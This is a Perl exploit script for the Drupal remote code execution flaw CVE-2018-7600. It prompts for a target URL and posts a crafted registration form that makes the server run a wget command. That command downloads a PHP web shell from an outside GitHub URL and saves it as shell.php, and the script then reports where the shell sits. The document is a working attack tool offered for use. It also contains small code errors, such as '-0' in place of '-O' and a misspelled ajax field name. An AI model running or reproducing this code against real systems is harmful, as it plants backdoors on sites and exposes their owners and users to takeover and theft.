#!/usr/bin/perl
# Title : Drupal 0day Remote PHP Code Execution (Perl)
# Author = GIST
# date : 14 April 2018
# CVE : CVE-2018-7600
# Vendor : https://www.drupal.org/
# Tested on : Ubuntu
use LWP::Simple;
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
print <<logo;
____ _ _____ _ _ _
| \ ___ _ _ ___ ___| | | __|_ _ ___| |___|_| |_ ___ ___
| | | _| | | . | .'| | | __|_'_| . | | . | | _| -_| _|
|____/|_| |___| _|__,|_| |_____|_,_| _|_|___|_|_| |___|_|
|_| |_|
logo
print "\nEnter Your Target URL > ";
$url=<>;
chomp($url);
$exploit = "$url/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax";
$ajax = "_drupa_ajax";
$mail = "mail[#post_render][]";
$maill= "mail[#type]";
$mailll = "mail[#markup]";
$wget = "wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php -0 shell.php";
$response = $ua->post($exploit, Content-Type => 'multipart/form-data', Content => [form_id => 'user_register_form', $ajax => '1', $mail => 'exec', $maill => 'markup', $mailll => $wget]);
if ($response =~ /200/)
{
print "\nPayload Uploaded successfully $url/shell.php\n";
}
else{
print "\nTarget Is Not Vulnerable\n";
}